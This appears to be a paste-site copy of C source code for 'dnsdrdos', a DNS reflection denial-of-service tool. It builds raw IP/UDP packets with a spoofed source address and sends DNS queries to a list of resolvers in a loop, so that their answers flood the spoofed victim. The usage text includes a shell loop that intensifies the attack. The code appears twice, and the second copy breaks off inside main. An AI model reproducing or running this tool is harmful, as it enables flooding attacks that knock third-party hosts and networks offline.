#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <string.h>
4. #include <unistd.h>
5. #include <getopt.h>
6. #include <sys/socket.h>
7. #include <arpa/inet.h>
8. #include <netinet/in.h>
9. #include <netinet/ip.h>
10. #include <netinet/udp.h>
11.  
12.  
13. /* global settings */
14. #define VERSION "v0.1"
15. #define ATOI(x) strtol(x, (char **) NULL, 10)
16. #define MAX_LEN 128 /* max line for dns server list */
17.  
18.  
19. /* default settings */
20. #define DEFAULT_SPOOF_ADDR "127.0.0.1"
21. #define DEFAULT_DOMAIN "google.com."
22. #define DEFAULT_DNS_PORT 53
23. #define DEFAULT_LOOPS 10000
24.  
25.  
26. /* error handling */
27. #define __EXIT_FAILURE exit(EXIT_FAILURE);
28. #define __EXIT_SUCCESS exit(EXIT_SUCCESS);
29.  
30. #define __ERR_GEN do { fprintf(stderr,"[-] ERROR: " __FILE__ ":%u -> ",\
31. __LINE__); fflush(stderr); perror(""); \
32. __EXIT_FAILURE } while (0)
33.  
34.  
35. /* dns header */
36. typedef struct {
37. unsigned short id;
38. unsigned char rd :1;
39. unsigned char tc :1;
40. unsigned char aa :1;
41. unsigned char opcode :4;
42. unsigned char qr :1;
43. unsigned char rcode :4;
44. unsigned char cd :1;
45. unsigned char ad :1;
46. unsigned char z :1;
47. unsigned char ra :1;
48. unsigned short q_count;
49. unsigned short ans_count;
50. unsigned short auth_count;
51. unsigned short add_count;
52. } dnsheader_t;
53.  
54.  
55. /* dns query */
56. typedef struct {
57. unsigned short qtype;
58. unsigned short qclass;
59. } query_t;
60.  
61.  
62. /* our job */
63. typedef struct {
64. char *file;
65. char **addrs;
66. uint16_t port;
67. unsigned int num_addrs;
68. char *spoof_addr;
69. char *domain;
70. unsigned int loops;
71. } job_t;
72.  
73.  
74. /* our bomb */
75. typedef struct {
76. int one;
77. int sock;
78. char *packet;
79. struct sockaddr_in target;
80. struct iphdr *ip;
81. struct udphdr *udp;
82. dnsheader_t *dns;
83. query_t *query;
84. } bomb_t;
85.  
86.  
87. /* just wrapper */
88. void *xmalloc(size_t);
89. void *xmemset(void *, int, size_t);
90. int xsocket(int, int, int);
91. void xclose(int);
92. void xsendto(int, const void *, size_t, int, const struct sockaddr *,
93. socklen_t);
94.  
95. /* prog stuff */
96. void banner();
97. void usage();
98. void check_argc(int);
99. void check_args();
100. FILE *open_file(char *);
101. unsigned int count_lines(char *);
102. char **read_lines(char *, unsigned int);
103. void check_uid();
104.  
105. /* net stuff */
106. bomb_t *create_rawsock(bomb_t *);
107. bomb_t *stfu_kernel(bomb_t *);
108. unsigned short checksum(unsigned short *, int);
109. bomb_t *build_ip_header(bomb_t *, job_t *, int);
110. bomb_t *build_udp_header(bomb_t *, job_t *);
111. bomb_t *build_dns_request(bomb_t *, job_t *);
112. void dns_name_format(char *, char *);
113. bomb_t *build_packet(bomb_t *, job_t *, int);
114. bomb_t *fill_sockaddr(bomb_t *);
115. void run_dnsdrdos(job_t *, int);
116. void free_dnsdrdos(job_t *);
117.  
118.  
119. /* wrapper for malloc() */
120. void *xmalloc(size_t size)
121. {
122. void *buff;
123.  
124.  
125. if ((buff = malloc(size)) == NULL) {
126. __ERR_GEN;
127. }
128.  
129. return buff;
130. }
131.  
132.  
133. /* wrapper for memset() */
134. void *xmemset(void *s, int c, size_t n)
135. {
136. if (!(s = memset(s, c, n))) {
137. __ERR_GEN;
138. }
139.  
140. return s;
141. }
142.  
143.  
144. /* wrapper for socket() */
145. int xsocket(int domain, int type, int protocol)
146. {
147. int sockfd = 0;
148.  
149.  
150. sockfd = socket(domain, type, protocol);
151.  
152. if (sockfd == -1) {
153. __ERR_GEN;
154. }
155.  
156. return sockfd;
157. }
158.  
159.  
160. /* wrapper for setsockopt() */
161. void xsetsockopt(int sockfd, int level, int optname, const void *optval,
162. socklen_t optlen)
163. {
164. int x = 0;
165.  
166.  
167. x = setsockopt(sockfd, level, optname, optval, optlen);
168.  
169. if (x != 0) {
170. __ERR_GEN;
171. }
172.  
173. return;
174. }
175.  
176.  
177. /* wrapper for close() */
178. void xclose(int fd)
179. {
180. int x = 0;
181.  
182.  
183. x = close(fd);
184.  
185. if (x != 0) {
186. __ERR_GEN;
187. }
188.  
189. return;
190. }
191.  
192.  
193. /* wrapper for sendto() */
194. void xsendto(int sockfd, const void *buf, size_t len, int flags,
195. const struct sockaddr *dest_addr, socklen_t addrlen)
196. {
197. int x = 0;
198.  
199.  
200. x = sendto(sockfd, buf, len, flags, dest_addr, addrlen);
201.  
202. if (x == -1) {
203. __ERR_GEN;
204. }
205.  
206. return;
207. }
208.  
209.  
210. /* usage and help */
211. void usage()
212. {
213. printf("usage:\n\n\
214. dnsdrdos -f <file> [options] | [misc]\n\
215. \ntarget:\n\n\
216. -f <file> - list of dns servers (only one ip-address per line!)\n\
217. -s <addr> - ip-address to spoof (default: 127.0.0.1)\n\
218. -d <domain> - which domain should be requested?\n\
219. (default: \"google.com.\")\n\
220. -l <num> - how many loops through list? (default: 10000)\n\nmisc:\n\n\
221. -V - show version\n\
222. -H - show help and usage\n\nexample:\n\n\
223. ./dnsdrdos -f nameserver.lst -s 192.168.2.211 -d google.com. -l 10000\n\n\
224. or better:\n\n\
225. $ for i in `seq 1 1000`; do ./dnsdrdos -f nameserver.lst \\\n\
226. -s 192.168.2.211 -d $i -l 10000; done\n\n\
227. This is better, because we ask dynamically for any domain names.\n\
228. Even if the domainname is not given, 'we' still would recieve DNS\n\
229. answers.\n");
230.  
231. __EXIT_SUCCESS;
232.  
233. return;
234. }
235.  
236.  
237. /* check first usage */
238. void check_argc(int argc)
239. {
240. if (argc < 2) {
241. fprintf(stderr, "[-] ERROR: use -H for help and usage\n");
242. __EXIT_FAILURE;
243. }
244.  
245. return;
246. }
247.  
248.  
249. /* check if host and port are selected */
250. void check_args(job_t *job)
251. {
252. if (!(job->file) || !(job->spoof_addr) || (job->loops <= 0)) {
253. fprintf(stderr, "[-] ERROR: you fucked up, mount /dev/brain\n");
254. __EXIT_FAILURE
255. }
256.  
257. return;
258. }
259.  
260.  
261. /* open file and return file pointer */
262. FILE *open_file(char *file)
263. {
264. FILE *fp = NULL;
265.  
266.  
267. if (!(fp = fopen(file, "r"))) {
268. __ERR_GEN;
269. }
270.  
271. return fp;
272. }
273.  
274.  
275. /* count lines -> wc -l :) */
276. unsigned int count_lines(char *file)
277. {
278. FILE *fp = NULL;
279. int c = 0;
280. unsigned int lines = 0;
281.  
282.  
283. fp = open_file(file);
284.  
285. while ((c = fgetc(fp)) != EOF) {
286. if ((c == '\n') || (c == 0x00)) {
287. lines++;
288. }
289. }
290. fclose(fp);
291.  
292. return lines;
293. }
294.  
295.  
296. /* read in ip-addresses line by line */
297. char **read_lines(char *file, unsigned int lines)
298. {
299. FILE *fp = NULL;
300. char *buffer = NULL;
301. char **words = NULL;
302. int i = 0;
303.  
304.  
305. fp = open_file(file);
306.  
307. buffer = (char *) xmalloc(MAX_LEN);
308. words = (char **) xmalloc(lines * sizeof(char *));
309. buffer = xmemset(buffer, 0x00, MAX_LEN);
310.  
311. while (fgets(buffer, MAX_LEN, fp) != NULL) {
312. if ((buffer[strlen(buffer) - 1] == '\n') ||
313. (buffer[strlen(buffer) - 1] == '\r')) {
314. buffer[strlen(buffer) - 1] = 0x00;
315. words[i] = (char *) xmalloc(MAX_LEN - 1);
316. words[i] = xmemset(words[i], 0x00, MAX_LEN - 1);
317. strncpy(words[i], buffer, MAX_LEN - 1);
318. buffer = xmemset(buffer, 0x00, MAX_LEN - 1);
319. i++;
320. } else {
321. continue;
322. }
323. }
324. free(buffer);
325. fclose(fp);
326.  
327. return words;
328. }
329.  
330.  
331. /* set default values */
332. job_t *set_defaults()
333. {
334. job_t *job;
335.  
336.  
337. job = (job_t *) xmalloc(sizeof(job_t));
338. job = xmemset(job, 0x00, sizeof(job_t));
339.  
340. job->port = (uint16_t) DEFAULT_DNS_PORT;
341. job->spoof_addr = DEFAULT_SPOOF_ADDR;
342. job->domain = DEFAULT_DOMAIN;
343. job->loops = (unsigned int) DEFAULT_LOOPS;
344.  
345. return job;
346. }
347.  
348.  
349. /* check for uid */
350. void check_uid()
351. {
352. if (getuid() != 0) {
353. fprintf(stderr, "[-] ERROR: you need to be r00t\n");
354. __EXIT_FAILURE;
355. }
356.  
357. return;
358. }
359.  
360.  
361. /* create raw socket */
362. bomb_t *create_rawsock(bomb_t *bomb)
363. {
364. bomb->sock = xsocket(AF_INET, SOCK_RAW, IPPROTO_RAW);
365.  
366. return bomb;
367. }
368.  
369.  
370. /* say STFU to kernel - we set our own headers */
371. bomb_t *stfu_kernel(bomb_t *bomb)
372. {
373. bomb->one = 1;
374.  
375. xsetsockopt(bomb->sock, IPPROTO_IP, IP_HDRINCL, &bomb->one,
376. sizeof(bomb->one));
377.  
378. return bomb;
379. }
380.  
381.  
382. /* checksum for IP and UDP header */
383. unsigned short checksum(unsigned short *addr, int len)
384. {
385. u_int32_t cksum = 0;
386.  
387.  
388. while(len > 0) {
389. cksum += *addr++;
390. len -= 2;
391. }
392.  
393. if(len == 0) {
394. cksum += *(unsigned char *) addr;
395. }
396.  
397. cksum = (cksum >> 16) + (cksum & 0xffff);
398. cksum = cksum + (cksum >> 16);
399.  
400. return (~cksum);
401. }
402.  
403.  
404. /* build and fill in ip header */
405. bomb_t *build_ip_header(bomb_t *bomb, job_t *job, int c)
406. {
407. bomb->ip = (struct iphdr *) bomb->packet;
408.  
409. bomb->ip->version = 4;
410. bomb->ip->ihl = 5;
411. bomb->ip->id = htonl(rand());
412. bomb->ip->saddr = inet_addr(job->spoof_addr);
413. bomb->ip->daddr = inet_addr(job->addrs[c]);
414. bomb->ip->ttl = 64;
415. bomb->ip->tos = 0;
416. bomb->ip->frag_off = 0;
417. bomb->ip->protocol = IPPROTO_UDP;
418. bomb->ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) +
419. sizeof(dnsheader_t) + sizeof(query_t) +
420. strlen(job->domain) + 1);
421. bomb->ip->check = checksum((unsigned short *) bomb->ip,
422. sizeof(struct iphdr));
423.  
424. return bomb;
425. }
426.  
427.  
428. /* build and fill in udp header */
429. bomb_t *build_udp_header(bomb_t *bomb, job_t *job)
430. {
431. bomb->udp = (struct udphdr *) (bomb->packet + sizeof(struct iphdr));
432.  
433. bomb->udp->source = htons(rand());
434. bomb->udp->dest = htons(DEFAULT_DNS_PORT);
435. bomb->udp->len = htons(sizeof(struct udphdr) + sizeof(dnsheader_t) +
436. sizeof(query_t) + strlen(job->domain) + 1);
437. bomb->udp->check = 0;
438.  
439. return bomb;
440. }
441.  
442.  
443. /* convert to dns format */
444. void dns_name_format(char *qname, char *host)
445. {
446. int i = 0;
447. int j = 0;
448.  
449.  
450. for (i = 0 ; i < (int) strlen(host) ; i++) {
451. if (host[i] == '.') {
452. *qname++ = i-j;
453. for (; j < i; j++) {
454. *qname++ = host[j];
455. }
456. j++;
457. }
458. }
459.  
460. *qname++ = 0x00;
461. }
462.  
463.  
464. /* build and fill in dns request */
465. bomb_t *build_dns_request(bomb_t *bomb, job_t *job)
466. {
467. char *qname = NULL;
468.  
469.  
470. bomb->dns = (dnsheader_t *) (bomb->packet + sizeof(struct iphdr) +
471. sizeof(struct udphdr));
472.  
473. bomb->dns->id = (unsigned short) htons(getpid());
474. bomb->dns->qr = 0;
475. bomb->dns->opcode = 0;
476. bomb->dns->aa = 0;
477. bomb->dns->tc = 0;
478. bomb->dns->rd = 1;
479. bomb->dns->ra = 0;
480. bomb->dns->z = 0;
481. bomb->dns->ad = 0;
482. bomb->dns->cd = 0;
483. bomb->dns->rcode = 0;
484. bomb->dns->q_count = htons(1);
485. bomb->dns->ans_count = 0;
486. bomb->dns->auth_count = 0;
487. bomb->dns->add_count = 0;
488.  
489. qname = &bomb->packet[sizeof(struct iphdr) + sizeof(struct udphdr) +
490. sizeof(dnsheader_t)];
491.  
492. dns_name_format(qname, job->domain);
493.  
494. bomb->query = (query_t *) &bomb->packet[sizeof(struct iphdr) +
495. sizeof(struct udphdr) + sizeof(dnsheader_t) + (strlen(qname) + 1)];
496.  
497. bomb->query->qtype = htons(1);
498. bomb->query->qclass = htons(1);
499.  
500. return bomb;
501. }
502.  
503.  
504. /* build packet */
505. bomb_t *build_packet(bomb_t *bomb, job_t *job, int c)
506. {
507. bomb->packet = (char *) xmalloc(1400);
508. bomb->packet = xmemset(bomb->packet, 0x00, 1400);
509.  
510. bomb = build_ip_header(bomb, job, c);
511. bomb = build_udp_header(bomb, job);
512. bomb = build_dns_request(bomb, job);
513.  
514. return bomb;
515. }
516.  
517.  
518. /* fill in sockaddr_in {} */
519. bomb_t *fill_sockaddr(bomb_t *bomb)
520. {
521. bomb->target.sin_family = AF_INET;
522. bomb->target.sin_port = bomb->udp->dest;
523. bomb->target.sin_addr.s_addr = bomb->ip->daddr;
524.  
525. return bomb;
526. }
527.  
528.  
529. /* start action! */
530. void run_dnsdrdos(job_t *job, int c)
531. {
532. bomb_t *bomb = NULL;
533.  
534.  
535. bomb = (bomb_t *) xmalloc(sizeof(bomb_t));
536. bomb = xmemset(bomb, 0x00, sizeof(bomb_t));
537.  
538. bomb = create_rawsock(bomb);
539. bomb = stfu_kernel(bomb);
540. bomb = build_packet(bomb, job, c);
541. bomb = fill_sockaddr(bomb);
542.  
543. xsendto(bomb->sock, bomb->packet, sizeof(struct iphdr) +
544. sizeof(struct udphdr) + sizeof(dnsheader_t) + sizeof(query_t) +
545. strlen(job->domain) + 1, 0, (struct sockaddr *) &bomb->target,
546. sizeof(bomb->target));
547.  
548. xclose(bomb->sock);
549. free(bomb->packet);
550. free(bomb);
551.  
552. return;
553. }
554.  
555.  
556. /* free dnsdrdos \o/ */
557. void free_dnsdrdos(job_t *job)
558. {
559. int i = 0;
560.  
561. for (i = 0; i < job->num_addrs; i++) {
562. free(job->addrs[i]);
563. }
564.  
565. free(job);
566.  
567. return;
568. }
569.  
570.  
571. /* here we go */
572. int main(int argc, char **argv)
573. {
574. int c = 0;
575. unsigned int i = 0;
576. job_t *job;
577.  
578.  
579. banner(); /* banner output is important! */
580. check_argc(argc);
581. job = set_defaults();
582.  
583. while ((c = getopt(argc, argv, "f:s:d:l:VH")) != -1) {
584. switch (c) {
585. case 'f':
586. job->file = optarg;
587. break;
588. case 's':
589. job->spoof_addr = optarg;
590. break;
591. case 'd':
592. job->domain = optarg;
593. break;
594. case 'l':
595. job->loops = (unsigned int) ATOI(optarg);
596. break;
597. case 'V':
598. puts(VERSION);
599. __EXIT_SUCCESS;
600. break;
601. case 'H':
602. usage();
603. break;
604. __EXIT_SUCCESS;
605. }
606. }
607.  
608. check_args(job);
609.  
610. job->num_addrs = count_lines(job->file);
611. job->addrs = read_lines(job->file, job->num_addrs);
612.  
613. check_uid();
614.  
615. for (i = 0; i < job->loops; i++) {
616. for (c = 0; c < job->num_addrs; c++) {
617. run_dnsdrdos(job, c);
618. }
619. }
620. printf("\n");
621.  
622. free_dnsdrdos(job);
623.  
624. return 0;
625. }
626.  
627. /* EOF */
628. RAW Paste Data
629.  
630. #include <stdio.h>
631. #include <stdlib.h>
632. #include <string.h>
633. #include <unistd.h>
634. #include <getopt.h>
635. #include <sys/socket.h>
636. #include <arpa/inet.h>
637. #include <netinet/in.h>
638. #include <netinet/ip.h>
639. #include <netinet/udp.h>
640.  
641.  
642. /* global settings */
643. #define VERSION "v0.1"
644. #define ATOI(x) strtol(x, (char **) NULL, 10)
645. #define MAX_LEN 128 /* max line for dns server list */
646.  
647.  
648. /* default settings */
649. #define DEFAULT_SPOOF_ADDR "127.0.0.1"
650. #define DEFAULT_DOMAIN "google.com."
651. #define DEFAULT_DNS_PORT 53
652. #define DEFAULT_LOOPS 10000
653.  
654.  
655. /* error handling */
656. #define __EXIT_FAILURE exit(EXIT_FAILURE);
657. #define __EXIT_SUCCESS exit(EXIT_SUCCESS);
658.  
659. #define __ERR_GEN do { fprintf(stderr,"[-] ERROR: " __FILE__ ":%u -> ",\
660. __LINE__); fflush(stderr); perror(""); \
661. __EXIT_FAILURE } while (0)
662.  
663.  
664. /* dns header */
665. typedef struct {
666. unsigned short id;
667. unsigned char rd :1;
668. unsigned char tc :1;
669. unsigned char aa :1;
670. unsigned char opcode :4;
671. unsigned char qr :1;
672. unsigned char rcode :4;
673. unsigned char cd :1;
674. unsigned char ad :1;
675. unsigned char z :1;
676. unsigned char ra :1;
677. unsigned short q_count;
678. unsigned short ans_count;
679. unsigned short auth_count;
680. unsigned short add_count;
681. } dnsheader_t;
682.  
683.  
684. /* dns query */
685. typedef struct {
686. unsigned short qtype;
687. unsigned short qclass;
688. } query_t;
689.  
690.  
691. /* our job */
692. typedef struct {
693. char *file;
694. char **addrs;
695. uint16_t port;
696. unsigned int num_addrs;
697. char *spoof_addr;
698. char *domain;
699. unsigned int loops;
700. } job_t;
701.  
702.  
703. /* our bomb */
704. typedef struct {
705. int one;
706. int sock;
707. char *packet;
708. struct sockaddr_in target;
709. struct iphdr *ip;
710. struct udphdr *udp;
711. dnsheader_t *dns;
712. query_t *query;
713. } bomb_t;
714.  
715.  
716. /* just wrapper */
717. void *xmalloc(size_t);
718. void *xmemset(void *, int, size_t);
719. int xsocket(int, int, int);
720. void xclose(int);
721. void xsendto(int, const void *, size_t, int, const struct sockaddr *,
722. socklen_t);
723.  
724. /* prog stuff */
725. void banner();
726. void usage();
727. void check_argc(int);
728. void check_args();
729. FILE *open_file(char *);
730. unsigned int count_lines(char *);
731. char **read_lines(char *, unsigned int);
732. void check_uid();
733.  
734. /* net stuff */
735. bomb_t *create_rawsock(bomb_t *);
736. bomb_t *stfu_kernel(bomb_t *);
737. unsigned short checksum(unsigned short *, int);
738. bomb_t *build_ip_header(bomb_t *, job_t *, int);
739. bomb_t *build_udp_header(bomb_t *, job_t *);
740. bomb_t *build_dns_request(bomb_t *, job_t *);
741. void dns_name_format(char *, char *);
742. bomb_t *build_packet(bomb_t *, job_t *, int);
743. bomb_t *fill_sockaddr(bomb_t *);
744. void run_dnsdrdos(job_t *, int);
745. void free_dnsdrdos(job_t *);
746.  
747.  
748. /* wrapper for malloc() */
749. void *xmalloc(size_t size)
750. {
751. void *buff;
752.  
753.  
754. if ((buff = malloc(size)) == NULL) {
755. __ERR_GEN;
756. }
757.  
758. return buff;
759. }
760.  
761.  
762. /* wrapper for memset() */
763. void *xmemset(void *s, int c, size_t n)
764. {
765. if (!(s = memset(s, c, n))) {
766. __ERR_GEN;
767. }
768.  
769. return s;
770. }
771.  
772.  
773. /* wrapper for socket() */
774. int xsocket(int domain, int type, int protocol)
775. {
776. int sockfd = 0;
777.  
778.  
779. sockfd = socket(domain, type, protocol);
780.  
781. if (sockfd == -1) {
782. __ERR_GEN;
783. }
784.  
785. return sockfd;
786. }
787.  
788.  
789. /* wrapper for setsockopt() */
790. void xsetsockopt(int sockfd, int level, int optname, const void *optval,
791. socklen_t optlen)
792. {
793. int x = 0;
794.  
795.  
796. x = setsockopt(sockfd, level, optname, optval, optlen);
797.  
798. if (x != 0) {
799. __ERR_GEN;
800. }
801.  
802. return;
803. }
804.  
805.  
806. /* wrapper for close() */
807. void xclose(int fd)
808. {
809. int x = 0;
810.  
811.  
812. x = close(fd);
813.  
814. if (x != 0) {
815. __ERR_GEN;
816. }
817.  
818. return;
819. }
820.  
821.  
822. /* wrapper for sendto() */
823. void xsendto(int sockfd, const void *buf, size_t len, int flags,
824. const struct sockaddr *dest_addr, socklen_t addrlen)
825. {
826. int x = 0;
827.  
828.  
829. x = sendto(sockfd, buf, len, flags, dest_addr, addrlen);
830.  
831. if (x == -1) {
832. __ERR_GEN;
833. }
834.  
835. return;
836. }
837.  
838.  
839. /* usage and help */
840. void usage()
841. {
842. printf("usage:\n\n\
843. dnsdrdos -f <file> [options] | [misc]\n\
844. \ntarget:\n\n\
845. -f <file> - list of dns servers (only one ip-address per line!)\n\
846. -s <addr> - ip-address to spoof (default: 127.0.0.1)\n\
847. -d <domain> - which domain should be requested?\n\
848. (default: \"google.com.\")\n\
849. -l <num> - how many loops through list? (default: 10000)\n\nmisc:\n\n\
850. -V - show version\n\
851. -H - show help and usage\n\nexample:\n\n\
852. ./dnsdrdos -f nameserver.lst -s 192.168.2.211 -d google.com. -l 10000\n\n\
853. or better:\n\n\
854. $ for i in `seq 1 1000`; do ./dnsdrdos -f nameserver.lst \\\n\
855. -s 192.168.2.211 -d $i -l 10000; done\n\n\
856. This is better, because we ask dynamically for any domain names.\n\
857. Even if the domainname is not given, 'we' still would recieve DNS\n\
858. answers.\n");
859.  
860. __EXIT_SUCCESS;
861.  
862. return;
863. }
864.  
865.  
866. /* check first usage */
867. void check_argc(int argc)
868. {
869. if (argc < 2) {
870. fprintf(stderr, "[-] ERROR: use -H for help and usage\n");
871. __EXIT_FAILURE;
872. }
873.  
874. return;
875. }
876.  
877.  
878. /* check if host and port are selected */
879. void check_args(job_t *job)
880. {
881. if (!(job->file) || !(job->spoof_addr) || (job->loops <= 0)) {
882. fprintf(stderr, "[-] ERROR: you fucked up, mount /dev/brain\n");
883. __EXIT_FAILURE
884. }
885.  
886. return;
887. }
888.  
889.  
890. /* open file and return file pointer */
891. FILE *open_file(char *file)
892. {
893. FILE *fp = NULL;
894.  
895.  
896. if (!(fp = fopen(file, "r"))) {
897. __ERR_GEN;
898. }
899.  
900. return fp;
901. }
902.  
903.  
904. /* count lines -> wc -l :) */
905. unsigned int count_lines(char *file)
906. {
907. FILE *fp = NULL;
908. int c = 0;
909. unsigned int lines = 0;
910.  
911.  
912. fp = open_file(file);
913.  
914. while ((c = fgetc(fp)) != EOF) {
915. if ((c == '\n') || (c == 0x00)) {
916. lines++;
917. }
918. }
919. fclose(fp);
920.  
921. return lines;
922. }
923.  
924.  
925. /* read in ip-addresses line by line */
926. char **read_lines(char *file, unsigned int lines)
927. {
928. FILE *fp = NULL;
929. char *buffer = NULL;
930. char **words = NULL;
931. int i = 0;
932.  
933.  
934. fp = open_file(file);
935.  
936. buffer = (char *) xmalloc(MAX_LEN);
937. words = (char **) xmalloc(lines * sizeof(char *));
938. buffer = xmemset(buffer, 0x00, MAX_LEN);
939.  
940. while (fgets(buffer, MAX_LEN, fp) != NULL) {
941. if ((buffer[strlen(buffer) - 1] == '\n') ||
942. (buffer[strlen(buffer) - 1] == '\r')) {
943. buffer[strlen(buffer) - 1] = 0x00;
944. words[i] = (char *) xmalloc(MAX_LEN - 1);
945. words[i] = xmemset(words[i], 0x00, MAX_LEN - 1);
946. strncpy(words[i], buffer, MAX_LEN - 1);
947. buffer = xmemset(buffer, 0x00, MAX_LEN - 1);
948. i++;
949. } else {
950. continue;
951. }
952. }
953. free(buffer);
954. fclose(fp);
955.  
956. return words;
957. }
958.  
959.  
960. /* set default values */
961. job_t *set_defaults()
962. {
963. job_t *job;
964.  
965.  
966. job = (job_t *) xmalloc(sizeof(job_t));
967. job = xmemset(job, 0x00, sizeof(job_t));
968.  
969. job->port = (uint16_t) DEFAULT_DNS_PORT;
970. job->spoof_addr = DEFAULT_SPOOF_ADDR;
971. job->domain = DEFAULT_DOMAIN;
972. job->loops = (unsigned int) DEFAULT_LOOPS;
973.  
974. return job;
975. }
976.  
977.  
978. /* check for uid */
979. void check_uid()
980. {
981. if (getuid() != 0) {
982. fprintf(stderr, "[-] ERROR: you need to be r00t\n");
983. __EXIT_FAILURE;
984. }
985.  
986. return;
987. }
988.  
989.  
990. /* create raw socket */
991. bomb_t *create_rawsock(bomb_t *bomb)
992. {
993. bomb->sock = xsocket(AF_INET, SOCK_RAW, IPPROTO_RAW);
994.  
995. return bomb;
996. }
997.  
998.  
999. /* say STFU to kernel - we set our own headers */
1000. bomb_t *stfu_kernel(bomb_t *bomb)
1001. {
1002. bomb->one = 1;
1003.  
1004. xsetsockopt(bomb->sock, IPPROTO_IP, IP_HDRINCL, &bomb->one,
1005. sizeof(bomb->one));
1006.  
1007. return bomb;
1008. }
1009.  
1010.  
1011. /* checksum for IP and UDP header */
1012. unsigned short checksum(unsigned short *addr, int len)
1013. {
1014. u_int32_t cksum = 0;
1015.  
1016.  
1017. while(len > 0) {
1018. cksum += *addr++;
1019. len -= 2;
1020. }
1021.  
1022. if(len == 0) {
1023. cksum += *(unsigned char *) addr;
1024. }
1025.  
1026. cksum = (cksum >> 16) + (cksum & 0xffff);
1027. cksum = cksum + (cksum >> 16);
1028.  
1029. return (~cksum);
1030. }
1031.  
1032.  
1033. /* build and fill in ip header */
1034. bomb_t *build_ip_header(bomb_t *bomb, job_t *job, int c)
1035. {
1036. bomb->ip = (struct iphdr *) bomb->packet;
1037.  
1038. bomb->ip->version = 4;
1039. bomb->ip->ihl = 5;
1040. bomb->ip->id = htonl(rand());
1041. bomb->ip->saddr = inet_addr(job->spoof_addr);
1042. bomb->ip->daddr = inet_addr(job->addrs[c]);
1043. bomb->ip->ttl = 64;
1044. bomb->ip->tos = 0;
1045. bomb->ip->frag_off = 0;
1046. bomb->ip->protocol = IPPROTO_UDP;
1047. bomb->ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) +
1048. sizeof(dnsheader_t) + sizeof(query_t) +
1049. strlen(job->domain) + 1);
1050. bomb->ip->check = checksum((unsigned short *) bomb->ip,
1051. sizeof(struct iphdr));
1052.  
1053. return bomb;
1054. }
1055.  
1056.  
1057. /* build and fill in udp header */
1058. bomb_t *build_udp_header(bomb_t *bomb, job_t *job)
1059. {
1060. bomb->udp = (struct udphdr *) (bomb->packet + sizeof(struct iphdr));
1061.  
1062. bomb->udp->source = htons(rand());
1063. bomb->udp->dest = htons(DEFAULT_DNS_PORT);
1064. bomb->udp->len = htons(sizeof(struct udphdr) + sizeof(dnsheader_t) +
1065. sizeof(query_t) + strlen(job->domain) + 1);
1066. bomb->udp->check = 0;
1067.  
1068. return bomb;
1069. }
1070.  
1071.  
1072. /* convert to dns format */
1073. void dns_name_format(char *qname, char *host)
1074. {
1075. int i = 0;
1076. int j = 0;
1077.  
1078.  
1079. for (i = 0 ; i < (int) strlen(host) ; i++) {
1080. if (host[i] == '.') {
1081. *qname++ = i-j;
1082. for (; j < i; j++) {
1083. *qname++ = host[j];
1084. }
1085. j++;
1086. }
1087. }
1088.  
1089. *qname++ = 0x00;
1090. }
1091.  
1092.  
1093. /* build and fill in dns request */
1094. bomb_t *build_dns_request(bomb_t *bomb, job_t *job)
1095. {
1096. char *qname = NULL;
1097.  
1098.  
1099. bomb->dns = (dnsheader_t *) (bomb->packet + sizeof(struct iphdr) +
1100. sizeof(struct udphdr));
1101.  
1102. bomb->dns->id = (unsigned short) htons(getpid());
1103. bomb->dns->qr = 0;
1104. bomb->dns->opcode = 0;
1105. bomb->dns->aa = 0;
1106. bomb->dns->tc = 0;
1107. bomb->dns->rd = 1;
1108. bomb->dns->ra = 0;
1109. bomb->dns->z = 0;
1110. bomb->dns->ad = 0;
1111. bomb->dns->cd = 0;
1112. bomb->dns->rcode = 0;
1113. bomb->dns->q_count = htons(1);
1114. bomb->dns->ans_count = 0;
1115. bomb->dns->auth_count = 0;
1116. bomb->dns->add_count = 0;
1117.  
1118. qname = &bomb->packet[sizeof(struct iphdr) + sizeof(struct udphdr) +
1119. sizeof(dnsheader_t)];
1120.  
1121. dns_name_format(qname, job->domain);
1122.  
1123. bomb->query = (query_t *) &bomb->packet[sizeof(struct iphdr) +
1124. sizeof(struct udphdr) + sizeof(dnsheader_t) + (strlen(qname) + 1)];
1125.  
1126. bomb->query->qtype = htons(1);
1127. bomb->query->qclass = htons(1);
1128.  
1129. return bomb;
1130. }
1131.  
1132.  
1133. /* build packet */
1134. bomb_t *build_packet(bomb_t *bomb, job_t *job, int c)
1135. {
1136. bomb->packet = (char *) xmalloc(1400);
1137. bomb->packet = xmemset(bomb->packet, 0x00, 1400);
1138.  
1139. bomb = build_ip_header(bomb, job, c);
1140. bomb = build_udp_header(bomb, job);
1141. bomb = build_dns_request(bomb, job);
1142.  
1143. return bomb;
1144. }
1145.  
1146.  
1147. /* fill in sockaddr_in {} */
1148. bomb_t *fill_sockaddr(bomb_t *bomb)
1149. {
1150. bomb->target.sin_family = AF_INET;
1151. bomb->target.sin_port = bomb->udp->dest;
1152. bomb->target.sin_addr.s_addr = bomb->ip->daddr;
1153.  
1154. return bomb;
1155. }
1156.  
1157.  
1158. /* start action! */
1159. void run_dnsdrdos(job_t *job, int c)
1160. {
1161. bomb_t *bomb = NULL;
1162.  
1163.  
1164. bomb = (bomb_t *) xmalloc(sizeof(bomb_t));
1165. bomb = xmemset(bomb, 0x00, sizeof(bomb_t));
1166.  
1167. bomb = create_rawsock(bomb);
1168. bomb = stfu_kernel(bomb);
1169. bomb = build_packet(bomb, job, c);
1170. bomb = fill_sockaddr(bomb);
1171.  
1172. xsendto(bomb->sock, bomb->packet, sizeof(struct iphdr) +
1173. sizeof(struct udphdr) + sizeof(dnsheader_t) + sizeof(query_t) +
1174. strlen(job->domain) + 1, 0, (struct sockaddr *) &bomb->target,
1175. sizeof(bomb->target));
1176.  
1177. xclose(bomb->sock);
1178. free(bomb->packet);
1179. free(bomb);
1180.  
1181. return;
1182. }
1183.  
1184.  
1185. /* free dnsdrdos \o/ */
1186. void free_dnsdrdos(job_t *job)
1187. {
1188. int i = 0;
1189.  
1190. for (i = 0; i < job->num_addrs; i++) {
1191. free(job->addrs[i]);
1192. }
1193.  
1194. free(job);
1195.  
1196. return;
1197. }
1198.  
1199.  
1200. /* here we go */
1201. int main(int argc, char **argv)
1202. {
1203. int c = 0;
1204. unsigned int i = 0;
1205. job_t *job;
1206.  
1207.  
1208. banner(); /* banner output is important! */
1209. check_argc(argc);
1210. job = set_defaults();
1211.  
